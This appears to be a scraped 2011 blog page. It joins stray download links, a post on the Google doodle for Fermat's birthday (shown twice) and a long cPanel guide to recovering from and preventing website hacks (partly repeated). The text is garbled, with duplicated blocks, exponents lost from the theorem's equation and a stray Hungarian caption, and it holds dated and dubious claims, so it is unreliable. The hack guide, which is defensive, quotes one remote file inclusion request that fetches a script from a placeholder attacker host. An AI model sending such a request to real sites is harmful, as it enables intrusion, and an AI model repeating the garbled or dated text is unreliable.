https://register.bsdcertification.org//register/register-for-an-exam
http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/index.html
FREE BSD GUIDE !@
https://launchpad.net/win32-image-writer
This tool is used for writing images to USB sticks or SD/CF cards on Windows.
Pierre de Fermat's Last Theorem celebrated in a cheeky Google doodle
- Wednesday, August 17, 2011
- By
- 0 comments
Today's Google doodle is apparently too small to contain the proof of Fermat's Last Theorem
Joyeux anniversaire, Pierre de Fermat! Today is the French mathematician's 410th birthday.
Fermat is best known as the originator or Fermat's Last Theorem, which consists of a deceptively simple-looking formula famously scrawled in a book's margin, where he claimed the proof was too large to fit. The theorem's fame grew because – despite the efforts of countless mathematicians – four centuries would pass before the publication of a successful proof in 1995 by Sir Andrew Wiles, a Royal Society Research Professor at Oxford.
Fermat's birthday is marked today with a Google doodle, and in a wry reference to the mathematician's original margin note, if you hover your mouse over the doodle the alt text is "I have discovered a truly marvelous proof of this theorem, which this doodle is too small to contain."
According to the theorem, for any integer n greater than two, there are no positive integers a, b, and c that can satisfy the equation:
an + bn = cn
You may recognise from your school days the simple case when n = 2 as Pythagoras' Theorem.
Perhaps Fermat would have preferred to be remembered for something other than a small comment in the margin of a book? Here are some of the things that you may not know about Pierre de Fermat.
• Pierre de Fermat is not Pierre de Fermat. He studied to be a lawyer at the University of Orleans, and went on to be the councillor at the High Court of Judicature in Toulouse. Here he became entitled to change his name from Pierre Fermat to Pierre de Fermat.
• Fermat has his own number. Fermat numbers have been found to be good at generating sequences of random numbers that are ideal for data encryption on computers, keeping all your banking and personal files safe.
• Fermat also has a little theorem. Fermat's Little Theorem is used in something called Fermat's Primality Test. The test tells us whether a whole number is a probable prime. Whereas a prime number is strictly a number only divisible by one and itself, a probable prime has similar properties but may be easier to generate. These numbers are very important in cryptography and internet security.
• Fermat is one of the founders of probability theory. Through his close relationship with Blaise Pascal, a mathematician and philosopher, he studied how chance behaves in games with dice. An exchange of letters between the two mathematicians developed a general formulation of probability theory – work which still provides the basic principles of how sporting odds are calculated today from horse racing to football.
It is a measure of Fermat's influence that many of his results are used today in computing and cryptography. However, he is well known for not giving rigorous mathematical proofs with his work. For example, the proof of Fermat's Little Theorem was first given not by Fermat but by Gottfried Leibniz.
This reticence has intrigued and frustrated mathematicians for centuries. On the plus side, there's still some of Fermat's work yet to be proven. So, given the inclination, you can try your hand at solving them.
Pierre de Fermat
Pierre de Fermat
Born August 17, 1601
Beaumont-de-Lomagne, France Died January 12, 1665 (aged 63)
Castres, France Residence France Nationality French Fields Mathematics and Law Known for Number theory
Analytic geometry
Fermat's principle
Probability
Fermat's Last Theorem Influences François Viète
Life and work
Fermat was born in Beaumont-de-Lomagne, Tarn-et-Garonne, France; the late 15th century mansion where Fermat was born is now a museum. He was of Basque origin. Fermat's father was a wealthy leather merchant and second consul of Beaumont-de-Lomagne. Pierre had a brother and two sisters and was almost certainly brought up in the town of his birth. There is little evidence concerning his school education, but it may have been at the local Franciscan monastery.
He attended the University of Toulouse before moving to Bordeaux in the second half of the 1620s. In Bordeaux he began his first serious mathematical researches and in 1629 he gave a copy of his restoration of Apollonius's De Locis Planis to one of the mathematicians there. Certainly in Bordeaux he was in contact with Beaugrand and during this time he produced important work on maxima and minima which he gave to Étienne d'Espagnet who clearly shared mathematical interests with Fermat. There he became much influenced by the work of François Viète.
From Bordeaux, Fermat went to Orléans where he studied law at the University. He received a degree in civil law before, in 1631, receiving the title of councillor at the High Court of Judicature in Toulouse, which he held for the rest of his life. Due to the office he now held he became entitled to change his name from Pierre Fermat to Pierre de Fermat. Fluent in Latin, Basque,classical Greek, Italian, and Spanish, Fermat was praised for his written verse in several languages, and his advice was eagerly sought regarding the emendation of Greek texts.
He communicated most of his work in letters to friends, often with little or no proof of his theorems. This allowed him to preserve his status as an "amateur" while gaining the recognition he desired. This naturally led to priority disputes with fellow contemporaries such as Descartes and Wallis. He developed a close relationship with Blaise Pascal.
Anders Hald writes that, "The basis of Fermat's mathematics was the classical Greek treatises combined with Vieta's new algebraic methods."
Holografikus kép Pierre de Fermat 1660. március 4 írt végrendeletéről – Departmental Archives,Haute-Garonne, Toulouse.
Joyeux anniversaire, Pierre de Fermat! Today is the French mathematician's 410th birthday.
Fermat is best known as the originator or Fermat's Last Theorem, which consists of a deceptively simple-looking formula famously scrawled in a book's margin, where he claimed the proof was too large to fit. The theorem's fame grew because – despite the efforts of countless mathematicians – four centuries would pass before the publication of a successful proof in 1995 by Sir Andrew Wiles, a Royal Society Research Professor at Oxford.
Fermat's birthday is marked today with a Google doodle, and in a wry reference to the mathematician's original margin note, if you hover your mouse over the doodle the alt text is "I have discovered a truly marvelous proof of this theorem, which this doodle is too small to contain."
According to the theorem, for any integer n greater than two, there are no positive integers a, b, and c that can satisfy the equation:
an + bn = cn
You may recognise from your school days the simple case when n = 2 as Pythagoras' Theorem.
Perhaps Fermat would have preferred to be remembered for something other than a small comment in the margin of a book? Here are some of the things that you may not know about Pierre de Fermat.
• Pierre de Fermat is not Pierre de Fermat. He studied to be a lawyer at the University of Orleans, and went on to be the councillor at the High Court of Judicature in Toulouse. Here he became entitled to change his name from Pierre Fermat to Pierre de Fermat.
• Fermat has his own number. Fermat numbers have been found to be good at generating sequences of random numbers that are ideal for data encryption on computers, keeping all your banking and personal files safe.
• Fermat also has a little theorem. Fermat's Little Theorem is used in something called Fermat's Primality Test. The test tells us whether a whole number is a probable prime. Whereas a prime number is strictly a number only divisible by one and itself, a probable prime has similar properties but may be easier to generate. These numbers are very important in cryptography and internet security.
• Fermat is one of the founders of probability theory. Through his close relationship with Blaise Pascal, a mathematician and philosopher, he studied how chance behaves in games with dice. An exchange of letters between the two mathematicians developed a general formulation of probability theory – work which still provides the basic principles of how sporting odds are calculated today from horse racing to football.
It is a measure of Fermat's influence that many of his results are used today in computing and cryptography. However, he is well known for not giving rigorous mathematical proofs with his work. For example, the proof of Fermat's Little Theorem was first given not by Fermat but by Gottfried Leibniz.
This reticence has intrigued and frustrated mathematicians for centuries. On the plus side, there's still some of Fermat's work yet to be proven. So, given the inclination, you can try your hand at solving them.
Pierre de Fermat
Pierre de Fermat
Born August 17, 1601
Beaumont-de-Lomagne, France Died January 12, 1665 (aged 63)
Castres, France Residence France Nationality French Fields Mathematics and Law Known for Number theory
Analytic geometry
Fermat's principle
Probability
Fermat's Last Theorem Influences François Viète
Life and work
Fermat was born in Beaumont-de-Lomagne, Tarn-et-Garonne, France; the late 15th century mansion where Fermat was born is now a museum. He was of Basque origin. Fermat's father was a wealthy leather merchant and second consul of Beaumont-de-Lomagne. Pierre had a brother and two sisters and was almost certainly brought up in the town of his birth. There is little evidence concerning his school education, but it may have been at the local Franciscan monastery.
He attended the University of Toulouse before moving to Bordeaux in the second half of the 1620s. In Bordeaux he began his first serious mathematical researches and in 1629 he gave a copy of his restoration of Apollonius's De Locis Planis to one of the mathematicians there. Certainly in Bordeaux he was in contact with Beaugrand and during this time he produced important work on maxima and minima which he gave to Étienne d'Espagnet who clearly shared mathematical interests with Fermat. There he became much influenced by the work of François Viète.
From Bordeaux, Fermat went to Orléans where he studied law at the University. He received a degree in civil law before, in 1631, receiving the title of councillor at the High Court of Judicature in Toulouse, which he held for the rest of his life. Due to the office he now held he became entitled to change his name from Pierre Fermat to Pierre de Fermat. Fluent in Latin, Basque,classical Greek, Italian, and Spanish, Fermat was praised for his written verse in several languages, and his advice was eagerly sought regarding the emendation of Greek texts.
He communicated most of his work in letters to friends, often with little or no proof of his theorems. This allowed him to preserve his status as an "amateur" while gaining the recognition he desired. This naturally led to priority disputes with fellow contemporaries such as Descartes and Wallis. He developed a close relationship with Blaise Pascal.
Anders Hald writes that, "The basis of Fermat's mathematics was the classical Greek treatises combined with Vieta's new algebraic methods."
Holografikus kép Pierre de Fermat 1660. március 4 írt végrendeletéről – Departmental Archives,Haute-Garonne, Toulouse.
Prevent Site from Getting Hacked: Complete Guide
- Sunday, August 14, 2011
- By
- 0 comments
Prevent Site from Getting Hacked: Complete Guide
Have you ever think about how you can Prevent your web Site from Getting Hacked, as you know so many threats are there in internet and so many hackers are trying to get your site down, so we have a some Precautions which can certainly help you and Prevent your site from Getting Hacked, this guide line can also be used after your site is hacked. I suggest you to make a safety shield before war begins.
The server configuration discussed here is Linux/Apache with cPanel.The general steps will be the same on any server, but the specifics will differ.
There’s a good chance you came to this page because your website was hacked and you want to know how to clean it up.
Step-by-step repair after a website hack
This will probably take several days. Don’t think it’s going to be easy.
1) Log into cPanel
If the line at the top that says, “Last login from: IP address” is not your IP address from the last time you logged in, write it down. It is probably the hacker.
2) Change passwords for cPanel and for publishing
Use strong passwords. A password MUST NOT BE a single word that is in any human language dictionary, and it SHOULD NOT CONTAIN any real word. It should be random characters.
a) If you publish with FrontPage, change your FrontPage password first:
1. Open your local copy of your site in FrontPage
2. Click the Remote Web Site tab and log in
3. Click Open your Remote Web site in FrontPage (this will open a new copy of FrontPage with your remote site in it)
4. Click Tools > Server > Change Password. Whenever you get a password prompt during this procedure, it wants the old one. It doesn’t want the new one until it asks for it.
After changing the FrontPage password…
b) Log in to your webhosting account and change the password there
Some webhosts might use cPanel for this. Others might have a separate login for password changes. Consider changing the passwords for your email accounts, too.
3) If it is a dire emergency, take your website offline
If the hacker inserted extremely offensive pages or installed a virus, protect your visitors and your reputation by taking your site offline.
While it’s closed, you likely won’t be able to access your site through FrontPage. That’s why you changed your FrontPage password before taking the site offline.
4) Enable log archiving in cPanel
1. Go to cPanel > Raw Log Manager.
2. Check the “Archive Logs…” box.
3. Uncheck the “Remove the previous month’s archived logs…” box.
4. Click Save
If log archiving was off at the time of the hack, it may be too late to see the original hack. However, if the hackers come back, their activity might now be logged, allowing you to identify their IP address.
5) Find and remove all files installed by the hack
This describes an ideal cleanup operation. Will you be able to fully complete every step? Probably not.
If your site isn’t huge, you might save a lot of trouble by deleting everything inside your public_html folder and republishing your entire site from a backup copy. You’ll still need to inspect your root directory (above public_html) and its other subdirectories for damage.
5a) Get a complete list of all the files in your website
There are three methods (Sections 5a, 5b, 5c). For most purposes, this first cron job method will be easier to review in detail than the other two methods.
You probably don’t have direct access to Linux on your server to create a directory listing, but you can create a cron job that will do it. It is the equivalent of the DOS command dir /s.
1. Go to cPanel > Cron jobs > Standard.
2. Enter the email address where you want the output sent,
3. Enter the command line to run. The switches are case-sensitive, so use exactly
this capitalization:
ls -1aFlqR
Here it is in upper case to make the letters distinct, but this command is NOT the same as the one above. Don’t use it: LS -1AFLQR.
The switches for the ls command are described at http://www.ss64.com/bash/ls.html and http://en.wikipedia.org/wiki/Ls.
4. Make selections in all the other fields to specify a time several minutes in the future.
5. Click “Save Crontab”.
6. After it runs, go back to Cron Jobs > Standard and delete this job.
The email will contain a listing with lines that look like the following examples for one directory and one file:
drwxr-x— 33 user user 4096 Feb 5 20:51 public_html/
-rw-r–r– 1 user user 16669 Feb 5 20:51 index.htm
A brief explanation:
d indicates a directory
The 3 groups of 3 (rwxrwxrwx) are permissions for User, Group, World.
r, w, x stand for Read, Write, Execute a program or Enter a directory.
Walkthrough of the above:
public_html above is a directory.
The User (owner, me) can read, write, or Enter that folder.
The Group (that I am member of) cannot Write to that folder (thus the “-” where the w would be)
The World (everyone else) has no permissions here (“—”). (I know that seems odd for public_html, but the reasons why are not useful here.)
index.htm, the home page:
User can Read or Write.
To everyone else (Group and World), the file is Read-only.
The user fields should show only your hosting account userID or some other ones that are obvious system names.
The numbers are file sizes.
The timestamps are timestamps.
There is further explanation in this post at Lunarforums.
How to use the listing:
7. If you have a file list like this that you made before the hack, compare the two lists to identify files in the new listing that don’t belong.
8. If you don’t have a prior list to compare against, review the new list for files that seem out of place. See What To Look For, below.
5b) Examine your site’s files in cPanel > File Manager
If you can’t use the cron job method, this is an alternative, but navigating up and down the directory tree will get very tedious very fast.
In File Manager, file and folder permissions are shown numerically. R=4, W=2, X=1. The permission level for a user is the sum, so the maximum a user can have is 7. If, for example, the User has RW, but Group and World only have R, then the permissions will be: 644.
5c) Examine your site’s files using FTP
With an FTP view of your website, the folders and files look like what you are used to in Windows Explorer. FTP view is available using Internet Explorer 6 or 7 and Windows Explorer. FTP view is easy to navigate, but it doesn’t show file and folder permissions.
a) FTP by IE6
In the IE6 address bar, type the FTP address for your site. It is probably something like: ftp://yourdomain.com/ or ftp://ftp.yourdomain.com/ If you don’t get a login prompt, click File > Login As…
b) FTP by IE7
Help for this is available in IE7 Help (F1) > Contents > FTP.
1. Open Tools >
Internet Options > Advanced
2. Make sure “Enable FTP folder view (outside IE)” is checked.
3. Click OK.
4. In the IE7 address bar, type the FTP address for your site.
5. Ignore the error page.
6. Click Page > Open FTP site in Windows Explorer…
7. At the FTP Folder Error dialog box, click OK.
8. Click File > Login As… to obtain the login prompt.
c) FTP by Windows Explorer
1. Enable the address bar (View > Toolbars > Address bar). You may need to unlock the toolbars, relocate, and resize it.
2. In the address bar, type the FTP address for your site.
3. At the FTP Folder Error dialog box, click OK.
4. Click File > Login As… to obtain the login prompt.
5d) What to look for
Regardless of the method you used to get your file list, look for and repair the following. If hacked pages contain clues such as URLs that will help identify the hacker, copy and save the useful text somewhere before you repair the page:
* Files you know don’t belong there. Some hacks install files with ridiculously obvious names like hacked.html or vulnerable.php, etc. Other files might have nonsensical names or names consisting of random character strings. Some files might be in locations that make them suspicious, like a .php file in your /images folder.
Be watchful for any files you don’t recognize, but be careful because some of them are probably required for your site to function properly and you just never noticed them before. You cannot just delete all the files you didn’t put on the site. Determine whether each one is malicious or not. When in doubt, try a web search on the filename or post a question in a forum where other people can tell you if that file is normal.
* Check your root directory (“/”) and its subdirectories for malicious or altered files. Inspect everything carefully. Even if you delete the contents of your public_html and republish the site from scratch, this doesn’t overwrite your folders above public_html, so you must check those manually.
* Find and remove malicious scripts. Look especially for PHP and CGI scripts that you didn’t create. Inspect existing PHP and other plain text scripts for signs of tampering. Backdoor scripts left in place can allow the hackers back in even after you’ve changed your password.
When in doubt, it is safest to stop using scripts you suspect might have been weak, especially ones you wrote yourself, until you can examine them and determine that they’re safe. Rename or delete them so the hacker can’t continue to access them by their previous names.
* Pages with modified dates more recent than you last saved the page yourself. Inspect the text and replace the file with a backup copy, if necessary.
* If you publish with FrontPage HTTP, it appears that whenever you publish any files, the timestamp of every .htm file on the site is set to the time of the publish. So in this case your timestamps may all be identical, except for hacked pages.
6) Check all file and folder permissions
Using the complete file list you made, or File Manager, make sure all file and folder permissions are what they should be. When in doubt, you can compare the permissions of similar or neighboring files and folders. A hacker is unlikely to bother with changing all permissions. Review the brief “RWX” explanation above and apply common sense. Your site visitors are “World”, so World needs Read access to files they are supposed to see. World should almost never have Write access to anything. Although different hosts might have different rules, common permissions for world-accessible folders are 755, and common permissions for world-accessible files are 644. It is left to you to figure out why. If you start running across what look like permissions hacks, you will need to do some studying and some detailed investigation of each file and folder.
A hacker can modify file or folder permissions to allow them to get back in even after you clean up everything else in your site. If they can get Write permission to one folder, they can upload exploit scripts to it and run them.
7) Change your passwords again
In case someone was “watching” inside your site while you did it the first time, do it again now that you know the site is clean.
Try to identify the hacker’s IP address
Stats programs like Analog, Webalizer, or AWStats are not going to be helpful here because they generate aggregated statistics. You need detail.
cPanel > Web/FTP Stats > Latest Visitors is useful and easy. It is a good place to go when you first notice the hack, but it is only a start. You really need the full raw logs.
a) If you have never used your site’s raw access logs before:
You website’s raw access logs are stored and sent to you as gzipped files. If you don’t have a program that will extract *.gz files, get the 7-Zip program from http://www.7-zip.org/. It is a command line utility that you run from a “DOS box” (aka “Command Prompt”).
b) Get your logs from cPanel > Raw Log Manager
1. Go to cPanel > Raw Log Manager
2. Click the name of the file you want to download.
3. At the Open or Save prompt, click Save. Use a descriptive filename. Save the file to a folder that will be easy to navigate to in a Command Prompt. C:TEMP works well.
4. Open a Command Prompt:
Start > All Programs > Accessories > Command Prompt, or
Start > Run > cmd.exe
5. Go to the folder where you saved the .gz file: cd temp
6. Type the command line to extract the .gz file:
7za.exe x filename.gz
7. You should get a report that says “Everything is Ok”.
8. I usually delete the .gz file and rename the output file to .log.
9. WordPad is best for viewing these log files as text. Set the font to a monospaced font, with word wrap Off.
10. You can import your HTTP (regular) log file into the Webstats.mdb Access database. It won’t import your FTP log.
11. The HTTP log will also import into Excel, but you will need to tweak the text import wizard settings to get the fields into their columns properly.
12. The FTP log is probably best viewed as text.
Go through the logs carefully. If log archiving was on at the time of the hack, look for suspicious activity in the days prior to the hack. Keep watching the logs in case the hackers come back.
Your regular log will show HTTP accesses, your normal site visitors. Mixed in with all the visitors and legitimate robots, you could find a person or robot GETting pages in an abnormal browse sequence (not following links on your site) or trying to GET pages that don’t exist on your site. They might be seeing if your site has particular pages that are part of widely used scripts that are known to have vulnerabilities. Look for HTTP POST activity. Not all POSTs are suspicious, though. If you use PHP, look for requests that attempt to inject code or variables into the page:
GET /index.php?inc=http://badsite.com/hackscript.txt.
Your FTP log will show FTP accesses, one way that hackers can download your pages, modify them, and upload them back to your website. The only IP addresses in the FTP log should be yours and other authorized FTP users.
In both logs, check the field called REMOTE_USER, User, or UserID. In the HTTP log, this field is blank (“-”) most of the time. Where it does have a value, make sure it’s your UserID and that the IP address is yours. Make sure the timestamps on the accesses match the times you were logged in.
c) Use .htaccess or cPanel > Deny IP to block the hacker’s HTTP access to your site
If you identified the hacker’s IP address, one site where you ca
n look it up to get more information about it is http://whois.domaintools.com/.
You can ban the hacker’s IP address from your site using your public_html/.htaccess file. Apache documentation for this is at: http://httpd.apache.org/docs/1.3/mod/mod_access.html.
Review the instructions in a prior article for how to open .htaccess for editing. As described there, insert the following line in a part of the file that is not enclosed in HTML-like tags.
deny from nnn.nnn.nnn.nnn
The nnn’s are the IP address to block.
If the hacker returns with a different IP that is in the same IP range (i.e. using the same ISP), you can block the whole range for a while, although that carries the risk of banning legitimate visitors, too.
The Apache documentation has instructions for banning a range. Some IP ranges are easily specified using a simple wildcard notation. Others ranges can only be successfully defined using “CIDR/netmask” notation. Although it looks intimidating, it’s easy after the first time you do it. I have a separate article describing how to calculate and use the CIDR/netmask.
d) If the hacker has obtained access to your cPanel or FTP, banning their IP address in .htaccess will NOT keep them out of cPanel and FTP.
If they have scripts that they call by HTTP, it will prevent them from doing that, but only until they log into cPanel and un-ban themselves in .htaccess.
9) Investigate what made the hack possible
It might be obvious or it might require detective work. The section below on hack prevention describes some common avenues of attack. It is important to identify how they got in so you can prevent the next attack. For example, if they got in through a vulnerable script, and you don’t rewrite or update the script, all the work you’ve done to this point is useless because they can come right back and wreck your site again.
Three common avenues:
1. Old versions of third party scripts with known vulnerabilities. Make sure you are using the latest versions of software for forums, image galleries, blogs, and everything else.
If you do all your installations through Fantastico, you can check your versions at cPanel > Fantastico > Installations overview.
Otherwise, the version is usually shown on the pages generated by the script, so go to your gallery, blog, or forum, and look around. Then compare the version to the latest one being distributed at the website for that software.
2. The site password was easy to crack.
3. Homebrew PHP or CGI scripts were flawed and had security holes. Make sure the settings in your php.ini file are as secure as possible.
10) Report or go after the hacker legally?
You can try, but your chances of getting anywhere with it might not be great.
Hacking is a violation of the terms of service for any legitimate web host or ISP. If you can prove that someone is using a particular IP address for hacking, you could report the incident to the web host or ISP in hopes that they might shut the perpetrator down. The contact email is often abuse@ the company.
What to do BEFORE your website is hacked, so it doesn’t get hacked
What is a hack?
A hack occurs when someone gets write access to your server so they are able to modify, add, or delete pages.
Many people ask, “How could my site have been hacked? The hacked page was 100% pure HTML.”
The answer is that the modification of the page wasn’t the hack. The hack was when they got write access to the server. Modifying the page was simply the thing they chose to do after they got in. Once they get in, they can do ANYTHING with your site that you can do, including alter static pages.
Why do they do it?
Business/money
The goal of most site hacks is to use vulnerable sites to make money. It is a business enterprise. They can:
* Use your site’s mail server to send spam.
* Insert links to their own sites, visible or invisible. The links from your site to theirs bring traffic and also boost their site’s rankings in search engines.
* Insert their AdSense code onto your site’s pages so clicks are credited to them.
* Put phishing pages on your site to try to obtain confidential information from your visitors.
* Use your server to host illegal content.
* Add viruses, adware, or spyware to your site so it’s downloaded onto your visitors’ computers to try to obtain their confidential information.
Fun, challenge, prestige, or malice
There are hackers who deface sites individually, but it’s time-intensive to hack sites one by one. Occasionally a site is hacked by someone who dislikes the site or its owner. These are not the major threats.
How do they do it?
Some examples:
* Automated web crawlers cast a wide net, identifying websites with a specific security weakness. For example, if a popular script is found to have a vulnerable page called forminfo.php, the crawler will visit every website it knows about, issuing a request to GET forminfo.php. If the request returns a code 404 (Page Not Found), then it moves on. If the page returns a code 200 (Success), the website becomes a target, either by a human hacker or by a computer program that executes the steps to exploit the weakness and install the hacker’s files onto the site.
* Crawl the web searching the source code of web pages for PHP or CGI scripts with names commonly used by email forms handlers. When one is found, an automated procedure starts sending it input to test whether the script can be tricked into sending spam to third parties.
* Automated password cracking programs hammer at cPanel logins until the correct user ID and password combinations are found. People who create their own passwords are remarkably predictable, and the algorithms used for password cracking are remarkably sophisticated.
Steps to prevent hacking
1) Always use strong passwords
If you don’t know what a strong password looks like, go to https://www.grc.com/passwords.htm. The third row on that page (“63 random alpha-numeric characters”) contains the types of characters to use for cPanel passwords. Pick the first, or any, 8 chars from that row. Any password that does not look like the ones you see on that page are bad.
* In cPanel, only 8 characters are significant, so use all 8. Use a mixture of upper and lower case letters and digits. Special characters (punctuation, etc.) do not seem to be allowed by cPanel.
The #1 threat to your website is internet attackers. There are thousands of them, and they will definitely try to damage your website if they get in. That is why you MUST use strong passwords that are difficult to crack. This must be the FIRST consideration.
Write down your strong password so you don’t forget it. People sometimes avoid strong passwords because they’ve heard passwords should never be written down. That rule was for Defense Department workers who had to worry about Soviet spies. You don’t. You have to worry about internet hackers. Writing down your strong password is only a trivial security risk. Using a weak password because that’s the only kind you can remember is a huge security risk.
Keep your written passwords appropriately safe for your situation. Do you have mischievous children? Don’t leave passwords lying around where they can find them. Malevolent coworkers? Don’t leave passwords in your desk drawers. Do you habitually lose your wallet or purse? Well then, don’t keep them there, either. Take whatever precautions are necessary for YOUR situation.
If you have a userID associated with your hosting account, keep that as secret as possible, too, because a hacker needs it to log in as you. Don
‘t post it in forum messages.
About strong passwords: http://en.wikipedia.org/wiki/Strong_password#strong_passwords
2) Don’t weaken your server’s file and folder permissions
* Do not modify the file and folder permissions on your server until you know what you’re doing. Study the permission settings carefully. Don’t guess.
Each folder and file on your Linux server has a set of permissions that determine who can read or write that file, execute that program, or enter that folder.
One mistake in a file or folder permission can allow a hacker to get into your site, and they won’t even need your password to do it.
3) Keep third party scripts up to date
If you use popular third party scripts like Coppermine, WordPress, SMF, vBulletin, phpBB, or any others, get on a mailing list or visit forums where updates are announced. When a security update is released, install it without delay.
When a vulnerability is found in a commonly used script, it is likely to be exploited soon by a lot of hackers because it gives them access to a large number of sites.
4) Write your own scripts securely
* Be aware of the potential security risks of each language you use.
* For PHP, use a php.ini file to block some common avenues of attack.
* Don’t use potentially insecure features of any language until you’ve studied and understand them. There are lots of online resources for learning how to code securely.
A vulnerable script can give hackers access to your user database and financial or other confidential or data.
* All data that comes into your script from the outside world poses a potential security risk. If your script takes input from a user or from passed parameters in a URL string or from a cookie, the input needs to be checked for validity, tested to determine if it contains injection exploit code, and cleaned (“escaped”) before you use it to include a file or access a database.
5) Block suspicious accesses with .htaccess
If you detect especially suspicious activity in your logs, you can block the IP addresses by using cPanel > Deny IP or with the appropriate code in your .htaccess file. Don’t be overzealous, though. It takes experience to learn what’s really suspicious and what’s just unfamiliar, and accidentally blocking legitimate visitors is bad public relations. Besides, if your site is otherwise secure, the probes to find security holes will fail, anyway.
6) Keep spyware off your computer. Prevent password interception.
* If you use a wireless network, make sure it is not open to eavesdroppers.
* Keep your computer free of spyware such as keyloggers.
* If you’re worried about your password being intercepted between you and your server, use encrypted https to log in to your server.
Preparations that will make hack diagnosis easier
1) Turn on log archiving in cPanel
Periodically delete the accumulated logs so they don’t consume all your hard drive space.
2) Get a complete list of your site files while they are known-good
This will be a baseline list of all the files that are supposed to be in your website. After a hack, it will help you decide whether a file you don’t recognize is related to the hack or is a required system file that you just never noticed before.
3) Explore your website and become familiar with what is there
Not just your pages, but the whole site, using FTP or File Manager. Get used to what is normal so things that aren’t will catch your attention.
How to know if you’ve been hacked
1) Whenever you log into cPanel,
Make sure “Last login from:” at the top of the screen shows your IP address from the last time you logged in.
2) Be alert for anything unusual when reviewing your
* Access logs,
* Usage reports in Webalizer, AWStats, Google Analytics, …
* Site data at Google Webmaster Central, (Google account and login required)
* Site data at Yahoo! Site Explorer. (Yahoo! account and login required)
Watch for occurrences of
* Unusual page names that you know you didn’t put on your site,
* Referrals or backlinks coming from weird sites or bad neighborhoods,
* Any indications that your site has pages it shouldn’t have, or connections to other sites that it shouldn’t have any connection with.
3) If your position in Google falls suddenly or if you drop out of the index,
one possible cause is that an exploit made modifications to your pages. Google sometimes notifies webmasters when they suspect a site has been hacked: http://www.mattcutts.com/blog/how-google-handles-hacked-sites/. They’ll try to contact you by any email address they can discover in their files or on your site. If Google discovers that your hacked site is now trying to distribute viruses or other badware, they sometimes also warn visitors about it when they try to go to your site from a search results page.
4) On search engine result pages (SERPs), make sure the text snippets for pages from your site consist of text you know is on those pages.
5) Use your browser’s View Source feature occasionally to look for invisible links in the HTML of your pages.
6) Check your site’s safety report and outlinks at http://www.siteadvisor.com/.
Have you ever think about how you can Prevent your web Site from Getting Hacked, as you know so many threats are there in internet and so many hackers are trying to get your site down, so we have a some Precautions which can certainly help you and Prevent your site from Getting Hacked, this guide line can also be used after your site is hacked. I suggest you to make a safety shield before war begins.
The server configuration discussed here is Linux/Apache with cPanel.The general steps will be the same on any server, but the specifics will differ.
There’s a good chance you came to this page because your website was hacked and you want to know how to clean it up.
Step-by-step repair after a website hack
This will probably take several days. Don’t think it’s going to be easy.
1) Log into cPanel
If the line at the top that says, “Last login from: IP address” is not your IP address from the last time you logged in, write it down. It is probably the hacker.
2) Change passwords for cPanel and for publishing
Use strong passwords. A password MUST NOT BE a single word that is in any human language dictionary, and it SHOULD NOT CONTAIN any real word. It should be random characters.
a) If you publish with FrontPage, change your FrontPage password first:
1. Open your local copy of your site in FrontPage
2. Click the Remote Web Site tab and log in
3. Click Open your Remote Web site in FrontPage (this will open a new copy of FrontPage with your remote site in it)
4. Click Tools > Server > Change Password. Whenever you get a password prompt during this procedure, it wants the old one. It doesn’t want the new one until it asks for it.
After changing the FrontPage password…
b) Log in to your webhosting account and change the password there
Some webhosts might use cPanel for this. Others might have a separate login for password changes. Consider changing the passwords for your email accounts, too.
3) If it is a dire emergency, take your website offline
If the hacker inserted extremely offensive pages or installed a virus, protect your visitors and your reputation by taking your site offline.
While it’s closed, you likely won’t be able to access your site through FrontPage. That’s why you changed your FrontPage password before taking the site offline.
4) Enable log archiving in cPanel
1. Go to cPanel > Raw Log Manager.
2. Check the “Archive Logs…” box.
3. Uncheck the “Remove the previous month’s archived logs…” box.
4. Click Save
If log archiving was off at the time of the hack, it may be too late to see the original hack. However, if the hackers come back, their activity might now be logged, allowing you to identify their IP address.
5) Find and remove all files installed by the hack
This describes an ideal cleanup operation. Will you be able to fully complete every step? Probably not.
If your site isn’t huge, you might save a lot of trouble by deleting everything inside your public_html folder and republishing your entire site from a backup copy. You’ll still need to inspect your root directory (above public_html) and its other subdirectories for damage.
5a) Get a complete list of all the files in your website
There are three methods (Sections 5a, 5b, 5c). For most purposes, this first cron job method will be easier to review in detail than the other two methods.
You probably don’t have direct access to Linux on your server to create a directory listing, but you can create a cron job that will do it. It is the equivalent of the DOS command dir /s.
1. Go to cPanel > Cron jobs > Standard.
2. Enter the email address where you want the output sent,
3. Enter the command line to run. The switches are case-sensitive, so use exactly
this capitalization:
ls -1aFlqR
Here it is in upper case to make the letters distinct, but this command is NOT the same as the one above. Don’t use it: LS -1AFLQR.
The switches for the ls command are described at http://www.ss64.com/bash/ls.html and http://en.wikipedia.org/wiki/Ls.
4. Make selections in all the other fields to specify a time several minutes in the future.
5. Click “Save Crontab”.
6. After it runs, go back to Cron Jobs > Standard and delete this job.
The email will contain a listing with lines that look like the following examples for one directory and one file:
drwxr-x— 33 user user 4096 Feb 5 20:51 public_html/
-rw-r–r– 1 user user 16669 Feb 5 20:51 index.htm
A brief explanation:
d indicates a directory
The 3 groups of 3 (rwxrwxrwx) are permissions for User, Group, World.
r, w, x stand for Read, Write, Execute a program or Enter a directory.
Walkthrough of the above:
public_html above is a directory.
The User (owner, me) can read, write, or Enter that folder.
The Group (that I am member of) cannot Write to that folder (thus the “-” where the w would be)
The World (everyone else) has no permissions here (“—”). (I know that seems odd for public_html, but the reasons why are not useful here.)
index.htm, the home page:
User can Read or Write.
To everyone else (Group and World), the file is Read-only.
The user fields should show only your hosting account userID or some other ones that are obvious system names.
The numbers are file sizes.
The timestamps are timestamps.
There is further explanation in this post at Lunarforums.
How to use the listing:
7. If you have a file list like this that you made before the hack, compare the two lists to identify files in the new listing that don’t belong.
8. If you don’t have a prior list to compare against, review the new list for files that seem out of place. See What To Look For, below.
5b) Examine your site’s files in cPanel > File Manager
If you can’t use the cron job method, this is an alternative, but navigating up and down the directory tree will get very tedious very fast.
In File Manager, file and folder permissions are shown numerically. R=4, W=2, X=1. The permission level for a user is the sum, so the maximum a user can have is 7. If, for example, the User has RW, but Group and World only have R, then the permissions will be: 644.
5c) Examine your site’s files using FTP
With an FTP view of your website, the folders and files look like what you are used to in Windows Explorer. FTP view is available using Internet Explorer 6 or 7 and Windows Explorer. FTP view is easy to navigate, but it doesn’t show file and folder permissions.
a) FTP by IE6
In the IE6 address bar, type the FTP address for your site. It is probably something like: ftp://yourdomain.com/ or ftp://ftp.yourdomain.com/ If you don’t get a login prompt, click File > Login As…
b) FTP by IE7
Help for this is available in IE7 Help (F1) > Contents > FTP.
1. Open Tools >
Internet Options > Advanced
